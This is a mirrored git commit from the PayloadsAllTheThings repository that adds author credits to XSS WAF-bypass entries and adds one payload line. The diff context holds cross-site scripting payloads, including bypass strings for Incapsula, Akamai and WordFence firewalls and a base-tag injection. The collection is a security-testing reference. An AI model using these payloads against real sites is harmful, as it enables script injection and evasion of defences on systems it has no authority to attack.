mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Credit fix - WAF bypass
This commit is contained in:
parent
1b2ee3e67a
commit
ddfdc51e68
2 changed files with 5 additions and 4 deletions
|
@ -512,6 +512,7 @@ perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
||||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
<IMG SRC="livescript:[code]">
|
<IMG SRC="livescript:[code]">
|
||||||
<BODY ONLOAD=alert('XSS')>
|
<BODY ONLOAD=alert('XSS')>
|
||||||
|
xss"><!--><svg/onload=alert(document.domain)>
|
||||||
<BGSOUND SRC="javascript:alert('XSS');">
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||||||
<BR SIZE="&{alert('XSS')}">
|
<BR SIZE="&{alert('XSS')}">
|
||||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||||
|
|
|
@ -769,7 +769,7 @@ Works for CSP like `script-src self`
|
||||||
|
|
||||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
||||||
|
|
||||||
### Incapsula WAF Bypass - 8th march
|
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
|
@ -777,13 +777,13 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
```
|
```
|
||||||
|
|
||||||
### Incapsula WAF Bypass - 11th september
|
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF Bypass by @zseano - 18th june
|
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
|
@ -795,7 +795,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
||||||
```
|
```
|
||||||
|
|
||||||
### WordFence WAF Bypass by @brutelogic - 12th september
|
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<a href=javascript:alert(1)>
|
<a href=javascript:alert(1)>
|
||||||
|
|
Loading…
Reference in a new issue